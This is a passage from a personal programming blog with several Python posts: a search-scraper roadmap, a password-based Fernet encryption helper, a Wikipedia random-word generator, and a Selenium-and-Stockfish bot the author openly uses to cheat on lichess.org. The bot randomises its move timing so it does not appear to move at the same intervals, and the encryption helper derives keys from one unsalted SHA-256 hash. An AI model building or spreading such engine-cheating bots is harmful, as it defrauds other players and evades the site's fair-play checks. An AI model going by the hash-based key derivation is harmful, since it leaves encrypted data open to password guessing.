<span class="n">parser</span> <span class="o">=</span> <span class="n">BaiduParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^https://duckduckgo\.com'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">DuckduckgoParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">parser</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'/tmp/testhtml.html'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">of</span><span class="p">:</span>
<span class="n">of</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
</code></pre></div>
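<p>The pseudo selector handling in the parser above can be isolated into a small helper. The following is only a minimal sketch of the idea, not code from GoogleScraper: the names <code>PSEUDO_RE</code> and <code>split_selector</code> are made up for illustration, and only the standard library is assumed.</p>

```python
import re

# Hypothetical helper, not part of GoogleScraper: matches a trailing
# '::text' or '::attr(name)' pseudo selector at the end of a selector.
PSEUDO_RE = re.compile(r'::(text|attr\(([^)]*)\))$')


def split_selector(selector):
    """Split a selector into (css, kind, attr).

    kind is 'text' or 'attr'; attr is the attribute name or None.
    """
    match = PSEUDO_RE.search(selector)
    if match is None:
        # No pseudo selector given: fall back to extracting the text,
        # which mirrors the last branch of the parser above.
        return selector.strip(), 'text', None
    css = selector[:match.start()].strip()
    if match.group(1) == 'text':
        return css, 'text', None
    return css, 'attr', match.group(2)


print(split_selector('h3.r > a:first-child::attr(href)'))
print(split_selector('div.s span.st::text'))
```

<p>The returned CSS part could then be handed to <code>css_to_xpath</code> as in the parser, while the second and third values decide whether the text content or an attribute is read from the matched element.</p>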
<h3>What can you expect from GoogleScraper in the near future?</h3>
<p>I am quite excited to develop some new features for GoogleScraper:</p>
<ol>
<li>Complete documentation, hosted on
<a href="https://readthedocs.org/" title="readthedocs">readthedocs</a>.</li>
<li>Asynchronous support for massively parallel scraping with 1000
proxies and more. I don't know yet which framework to use. Maybe
Twisted or something more low-level (libevent, epoll, ...).</li>
<li>SQLAlchemy integration. I am really excited about that.</li>
<li>Cleaner API.</li>
<li>Complete configuration for all search engine parameters.</li>
<li>Many examples that show how to use GoogleScraper effectively.</li>
</ol>
<p>Many thanks for your patience and time!<br>
Nikolai</p>Using the Python cryptography module with custom passwords2014-10-19T11:50:00+02:002014-10-19T11:50:00+02:00Nikolai Tschachertag:incolumitas.com,2014-10-19:/2014/10/19/using-the-python-cryptography-module-with-custom-passwords/<p>Hey all</p>
<p>I recently discovered a <a href="https://cryptography.io/en/latest/" title="cryptography">quite cute crypto
module</a> for Python.
It is divided into two logical security layers. The first
(<a href="https://cryptography.io/en/latest/fernet/" title="Fernet">Fernet</a>) can be
used by programmers without a cryptography background in a way that makes it unlikely
to introduce any security flaws. The second layer (called
<a href="https://cryptography.io/en/latest/hazmat/primitives/" title="hazmat">Hazmat</a>)
allows access to all kinds of cryptographic primitives, such as HMACs
and asymmetric encryption functions.</p>
<h3>The Problem</h3>
<p>Normally you don't want to use primitives, because they are tricky to get
right (even for advanced programmers). Unfortunately, the secure
and simple Fernet API:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="kn">from</span> <span class="nn">cryptography.fernet</span> <span class="kn">import</span> <span class="n">Fernet</span>
<span class="o">>>></span> <span class="n">key</span> <span class="o">=</span> <span class="n">Fernet</span><span class="o">.</span><span class="n">generate_key</span><span class="p">()</span>
<span class="o">>>></span> <span class="n">f</span> <span class="o">=</span> <span class="n">Fernet</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">token</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="sa">b</span><span class="s2">"my deep dark secret"</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">token</span>
<span class="sa">b</span><span class="s1">'...'</span>
<span class="o">>>></span> <span class="n">f</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">token</span><span class="p">)</span>
<span class="sa">b</span><span class="s1">'my deep dark secret'</span>
</code></pre></div>
<p>suffers from the huge inconvenience that you need to store (or,
imagine, remember!) a 32-byte key in order to decrypt the tokens that
Fernet outputs.<br>
It would be much more convenient to just pass a password to Fernet,
which in turn makes a 32-byte, Base64-encoded encryption key out of
it. Of course your own
password is much less secure than 32 bytes from <code>os.urandom(32)</code>, but
at least it is usable.</p>
<p>So I came up with this little extra code to use Fernet with a custom
password:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">from</span> <span class="nn">cryptography.fernet</span> <span class="kn">import</span> <span class="n">Fernet</span>
<span class="kn">from</span> <span class="nn">cryptography.hazmat.primitives</span> <span class="kn">import</span> <span class="n">hashes</span>
<span class="kn">from</span> <span class="nn">cryptography.hazmat.backends</span> <span class="kn">import</span> <span class="n">default_backend</span>
<span class="k">def</span> <span class="nf">get_key</span><span class="p">(</span><span class="n">password</span><span class="p">):</span>
    <span class="c1"># SHA-256 yields exactly the 32 bytes Fernet needs; Fernet expects them URL-safe Base64 encoded</span>
    <span class="n">digest</span> <span class="o">=</span> <span class="n">hashes</span><span class="o">.</span><span class="n">Hash</span><span class="p">(</span><span class="n">hashes</span><span class="o">.</span><span class="n">SHA256</span><span class="p">(),</span> <span class="n">backend</span><span class="o">=</span><span class="n">default_backend</span><span class="p">())</span>
    <span class="n">digest</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">base64</span><span class="o">.</span><span class="n">urlsafe_b64encode</span><span class="p">(</span><span class="n">digest</span><span class="o">.</span><span class="n">finalize</span><span class="p">())</span>

<span class="k">def</span> <span class="nf">encrypt</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span>
    <span class="n">f</span> <span class="o">=</span> <span class="n">Fernet</span><span class="p">(</span><span class="n">get_key</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
    <span class="k">return</span> <span class="n">f</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">token</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span>
    <span class="n">f</span> <span class="o">=</span> <span class="n">Fernet</span><span class="p">(</span><span class="n">get_key</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
    <span class="k">return</span> <span class="n">f</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">token</span><span class="p">))</span>
</code></pre></div>
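<p>A single SHA-256 pass is fast to brute-force, so a salted, deliberately slow key derivation is a common alternative. The following is only a sketch of that idea, not the code used above: it swaps the plain hash for PBKDF2 from the standard library, and the helper name <code>derive_fernet_key</code>, the 16-byte salt and the iteration count are assumptions chosen for illustration. The salt would have to be stored next to the ciphertext so the same key can be derived again.</p>

```python
import base64
import hashlib
import os


def derive_fernet_key(password: bytes, salt: bytes, iterations: int = 600_000) -> bytes:
    """Stretch a password into a URL-safe Base64 encoded 32-byte key.

    Hypothetical helper: the name, salt size and iteration count are
    illustrative assumptions, not part of the cryptography library.
    """
    # PBKDF2-HMAC-SHA256 makes every password guess cost `iterations` hash rounds
    raw = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=32)
    # 32 raw bytes become 44 Base64 characters, the key format Fernet accepts
    return base64.urlsafe_b64encode(raw)


salt = os.urandom(16)  # random per password; keep it alongside the token
key = derive_fernet_key(b"my password", salt)
print(len(key))  # 44
```

<p>The resulting <code>key</code> can be passed to <code>Fernet(key)</code> in place of the output of <code>get_key</code>.</p>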
<p>I hope it helps somebody!</p>Beautiful, beautiful python2014-07-11T19:35:00+02:002014-07-11T19:35:00+02:00Nikolai Tschachertag:incolumitas.com,2014-07-11:/2014/07/11/beautiful-beautiful-python/<h3>Hey</h3>
<p>After a day of programming I went home to program a little more, trying
to find a way to implement some tests for my
<a href="https://github.com/NikolaiT/GoogleScraper" title="Google Scraper on Github">GoogleScraper</a>
project, which had lacked attention for a long time. I needed some test
data, in my case some words to search for with the above-mentioned
scraper, and once more I realized how powerful Python (or any
programming language) is. This silly little snippet comes in handy if
you need some random words for testing purposes:</p>
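<p>The core of the trick is a length-bounded regular expression, which can be tried offline first. The following is a minimal sketch under my own assumptions: the helper name <code>words_of_length</code> and the sample sentence are made up for illustration, and the <code>\b</code> word boundaries are added so that only whole words match.</p>

```python
import re


def words_of_length(text, wordlength=range(10, 15), n=50):
    """Return up to n distinct whole words whose length lies in wordlength.

    Hypothetical helper for illustration; it works on a local string
    instead of a downloaded page.
    """
    # range(10, 15) means lengths 10..14, so the upper regex bound is stop - 1
    pattern = re.compile(r'\b[a-zA-Z]{%d,%d}\b' % (wordlength.start, wordlength.stop - 1))
    # sorted() makes the result deterministic; a bare set has no stable order
    return sorted(set(pattern.findall(text)))[:n]


sample = "Python makes scraping Wikipedia surprisingly straightforward"
print(words_of_length(sample, range(8, 11)))  # ['Wikipedia', 'scraping']
```

<p>The full version, which pulls its text from a random Wikipedia article, is:</p>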
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">random_words</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span> <span class="n">wordlength</span><span class="o">=</span><span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">15</span><span class="p">)):</span>
    <span class="sd">"""Read a random English wiki article and extract some words.</span>

<span class="sd">    Arguments:</span>
<span class="sd">    n -- The number of words to return. Returns all found ones if fewer than n were found.</span>

<span class="sd">    Keyword arguments:</span>
<span class="sd">    wordlength -- A range that forces the words to have a specific length.</span>
<span class="sd">    """</span>
    <span class="c1"># \b restricts matches to whole words; range.stop is exclusive, hence stop - 1</span>
    <span class="n">valid_words</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'\b[a-zA-Z]{{</span><span class="si">{}</span><span class="s1">,</span><span class="si">{}</span><span class="s1">}}\b'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">wordlength</span><span class="o">.</span><span class="n">start</span><span class="p">,</span> <span class="n">wordlength</span><span class="o">.</span><span class="n">stop</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span>
    <span class="n">found</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">valid_words</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://en.wikipedia.org/wiki/Special:Random'</span><span class="p">)</span><span class="o">.</span><span class="n">text</span><span class="p">)))</span>
    <span class="c1"># Slicing never raises IndexError; it returns everything if n is too large</span>
    <span class="k">return</span> <span class="n">found</span><span class="p">[:</span><span class="n">n</span><span class="p">]</span>

<span class="nb">print</span><span class="p">(</span><span class="n">random_words</span><span class="p">(</span><span class="mi">200</span><span class="p">,</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="mi">6</span><span class="p">)))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">random_words</span><span class="p">(</span><span class="mi">77</span><span class="p">,</span> <span class="nb">range</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span> <span class="mi">26</span><span class="p">)))</span>
</code></pre></div>Lichess.org chess bot!2014-04-23T18:03:00+02:002014-04-23T18:03:00+02:00Nikolai Tschachertag:incolumitas.com,2014-04-23:/2014/04/23/lichess-org-chess-bot/<p><strong>22.05.2014: Updated the bot, should work better now</strong></p>
<p>Hi everyone!</p>
<p>I was in a coding mood during Easter and decided to write a small chess
bot using
<a href="http://selenium-python.readthedocs.org/en/latest/" title="selenium python">selenium</a>
and the <a href="http://stockfishchess.org/" title="stockfish engine">stockfish</a> engine to
cheat a bit on
<a href="http://en.lichess.org/" title="lichess chess arena">lichess.org</a>.</p>
<p>I think the code is pretty self-explanatory, so I won't discuss it in
depth here. You can tweak the config; the comments should explain what
the parameters do.</p>
<p>The config is at the beginning of the code, so modify it there. You
will probably want to change it to use your own username and password. Make sure that
you download and install stockfish, then supply the correct path in
the 'stockfish_binary' parameter.</p>
<p>As always: Have fun!</p>
<p>Some open issues:</p>
<ul>
<li>Sometimes the last move fails because the bot wants to start a new game
before it can deliver checkmate</li>
<li>Promoting doesn't work yet :/</li>
</ul>
<p>Here is the code:</p>
<div class="highlight"><pre><span></span><code><span class="n">__author__</span> <span class="o">=</span> <span class="s1">'nikolai'</span>
<span class="n">__date__</span> <span class="o">=</span> <span class="s1">'Easter 2014'</span>
<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s1">'username'</span> <span class="p">:</span> <span class="s1">'probably_a_spider'</span><span class="p">,</span> <span class="c1"># the login username</span>
    <span class="s1">'password'</span> <span class="p">:</span> <span class="s1">'somepwd'</span><span class="p">,</span> <span class="c1"># the login password</span>
    <span class="s1">'stockfish_binary'</span> <span class="p">:</span> <span class="s1">'/home/nikolai/PycharmProjects/LichessBot/stockfish-dd-src/src/stockfish'</span><span class="p">,</span> <span class="c1"># the path to your local stockfish binary</span>
    <span class="c1"># Set to True if the bot should play forever</span>
    <span class="s1">'pwn_forever'</span> <span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># if the bot should play endlessly</span>
    <span class="s1">'min_per_side'</span> <span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="c1"># minutes on the clock for each player</span>
    <span class="s1">'increment'</span> <span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># the increment per move</span>
    <span class="s1">'thinking_time'</span><span class="p">:</span> <span class="mf">.5</span><span class="p">,</span> <span class="c1"># How long stockfish is allowed to search; set to None and stockfish will search 0.75 seconds by default</span>
    <span class="s1">'thinking_skew'</span><span class="p">:</span> <span class="mf">.2</span> <span class="c1"># The maximal random deviation of the thinking time as a fraction (0-1), so the bot does not appear to move at the same time intervals all the time</span>
<span class="p">}</span>
<span class="kn">from</span> <span class="nn">selenium</span> <span class="kn">import</span> <span class="n">webdriver</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver</span> <span class="kn">import</span> <span class="n">ActionChains</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver.common.by</span> <span class="kn">import</span> <span class="n">By</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver.support.ui</span> <span class="kn">import</span> <span class="n">WebDriverWait</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver.support</span> <span class="kn">import</span> <span class="n">expected_conditions</span> <span class="k">as</span> <span class="n">EC</span>
<span class="kn">from</span> <span class="nn">selenium.common.exceptions</span> <span class="kn">import</span> <span class="n">TimeoutException</span><span class="p">,</span> <span class="n">NoSuchElementException</span><span class="p">,</span> <span class="n">UnexpectedAlertPresentException</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="k">def</span> <span class="nf">get</span><span class="p">(</span><span class="n">proc</span><span class="p">,</span> <span class="n">poll</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
    <span class="c1"># Read engine output until it reports 'readyok' or a 'bestmove'</span>
    <span class="k">if</span> <span class="n">poll</span><span class="p">:</span>
        <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'isready</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
    <span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
        <span class="n">line</span> <span class="o">=</span> <span class="n">proc</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
        <span class="n">buf</span> <span class="o">+=</span> <span class="n">line</span>
        <span class="k">if</span> <span class="s1">'readyok'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
            <span class="k">return</span> <span class="n">buf</span>
        <span class="k">if</span> <span class="s1">'bestmove'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
            <span class="k">return</span> <span class="n">buf</span>
<span class="k">def</span> <span class="nf">init_stockfish</span><span class="p">():</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]):</span>
        <span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'Stockfish binary not found'</span><span class="p">)</span>
    <span class="c1"># bufsize=1 requests line buffering so each command reaches the engine as soon as it is written</span>
    <span class="n">proc</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">([</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]],</span> <span class="n">universal_newlines</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">bufsize</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span>
                            <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdin</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">)</span>
    <span class="n">greeting</span> <span class="o">=</span> <span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">)</span>
    <span class="k">if</span> <span class="s1">'Stockfish'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">greeting</span><span class="p">:</span>
        <span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'Could not execute stockfish'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'uci</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">)</span>
    <span class="c1"># stolen from https://github.com/brandonhsiao/lichess-bot/blob/master/server.py</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'ucinewgame</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Hash value 128</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Threads value 4</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Best Book Move value true</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Aggressiveness value 200</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Cowardice value 0</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Contempt Factor value 50</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">proc</span>

<span class="n">proc</span> <span class="o">=</span> <span class="n">init_stockfish</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">make_move</span><span class="p">(</span><span class="n">thinking_time</span><span class="o">=</span><span class="mf">.5</span><span class="p">,</span> <span class="n">moves</span><span class="o">=</span><span class="p">[]):</span>
    <span class="k">if</span> <span class="n">moves</span><span class="p">:</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="s1">'position startpos moves </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">' '</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">moves</span><span class="p">))</span>
        <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
    <span class="c1"># Let the engine search for thinking_time seconds, then ask for its best move</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'go infinite</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">thinking_time</span><span class="p">))</span>
    <span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">ve</span><span class="p">:</span>
        <span class="nb">print</span><span class="p">(</span><span class="n">ve</span><span class="p">)</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'stop</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">out</span> <span class="o">=</span> <span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">,</span> <span class="kc">False</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">bestmove</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'bestmove\s(?P&lt;move&gt;[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'move'</span><span class="p">)</span>
        <span class="n">ponder</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'ponder\s(?P&lt;ponder&gt;[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'ponder'</span><span class="p">)</span>
    <span class="k">except</span> <span class="ne">AttributeError</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">False</span>
    <span class="k">return</span> <span class="n">bestmove</span>
<span class="k">def</span> <span class="nf">newgame_stockfish</span><span class="p">():</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'ucinewgame</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">quit_stockfish</span><span class="p">():</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'quit</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">proc</span><span class="o">.</span><span class="n">terminate</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">login</span><span class="p">():</span>
    <span class="n">wd</span> <span class="o">=</span> <span class="n">webdriver</span><span class="o">.</span><span class="n">Firefox</span><span class="p">()</span>
    <span class="n">wd</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://en.lichess.org/login'</span><span class="p">)</span>
    <span class="n">u</span><span class="p">,</span> <span class="n">p</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_name</span><span class="p">(</span><span class="s2">"username"</span><span class="p">),</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_name</span><span class="p">(</span><span class="s2">"password"</span><span class="p">)</span>
    <span class="n">u</span><span class="o">.</span><span class="n">send_keys</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span>
    <span class="n">p</span><span class="o">.</span><span class="n">send_keys</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])</span>
    <span class="n">p</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">wd</span>
<span class="k">def</span> <span class="nf">create_game</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="n">min_per_side</span><span class="o">=</span><span class="n">config</span><span class="p">[</span><span class="s1">'min_per_side'</span><span class="p">],</span> <span class="n">increment</span><span class="o">=</span><span class="n">config</span><span class="p">[</span><span class="s1">'increment'</span><span class="p">]):</span>
    <span class="n">wait</span> <span class="o">=</span> <span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">10</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">element</span> <span class="o">=</span> <span class="n">wait</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">element_to_be_clickable</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">CSS_SELECTOR</span><span class="p">,</span><span class="s1">'a[title="Create a game"]'</span><span class="p">)))</span>
        <span class="n">element</span><span class="o">.</span><span class="n">click</span><span class="p">()</span>
    <span class="k">except</span> <span class="n">UnexpectedAlertPresentException</span><span class="p">:</span>
        <span class="k">pass</span>
    <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="nb">print</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>
    <span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">presence_of_element_located</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span> <span class="s1">'increment'</span><span class="p">)))</span>
    <span class="c1"># Change the inputs with a bit of jQuery (but wait first until the DOM is loaded)</span>
    <span class="n">wd</span><span class="o">.</span><span class="n">execute_script</span><span class="p">(</span><span class="s2">"$('#time').val('</span><span class="si">{}</span><span class="s2">')"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">min_per_side</span><span class="p">)))</span>
    <span class="n">wd</span><span class="o">.</span><span class="n">execute_script</span><span class="p">(</span><span class="s2">"$('#increment').val('</span><span class="si">{}</span><span class="s2">')"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">increment</span><span class="p">)))</span>
    <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_name</span><span class="p">(</span><span class="s1">'color'</span><span class="p">)</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">play</span><span class="p">(</span><span class="n">wd</span><span class="p">):</span>
<span class="k">def</span> <span class="nf">move</span><span class="p">(</span><span class="n">moves</span><span class="o">=</span><span class="p">[]):</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">config</span><span class="p">[</span><span class="s1">'thinking_time'</span><span class="p">]</span> <span class="ow">or</span> <span class="mf">.75</span>
<span class="k">if</span> <span class="n">config</span><span class="p">[</span><span class="s1">'thinking_skew'</span><span class="p">]:</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="n">random</span><span class="o">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">config</span><span class="p">[</span><span class="s1">'thinking_skew'</span><span class="p">]</span><span class="o">*</span><span class="mi">1000</span><span class="p">)</span> <span class="o">/</span> <span class="mi">1000</span><span class="p">)</span>
<span class="n">move</span> <span class="o">=</span> <span class="n">make_move</span><span class="p">(</span><span class="n">thinking_time</span><span class="o">=</span><span class="n">t</span><span class="p">,</span> <span class="n">moves</span><span class="o">=</span><span class="n">moves</span><span class="p">)</span>
<span class="k">if</span> <span class="n">move</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i]Bot is going to make move </span><span class="si">{}</span><span class="s1"> by calculating </span><span class="si">{}</span><span class="s1"> seconds'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">move</span><span class="p">,</span> <span class="nb">float</span><span class="p">(</span><span class="n">t</span><span class="p">)))</span>
<span class="n">f</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">move</span><span class="p">[:</span><span class="mi">2</span><span class="p">],</span> <span class="n">move</span><span class="p">[</span><span class="mi">2</span><span class="p">:]</span>
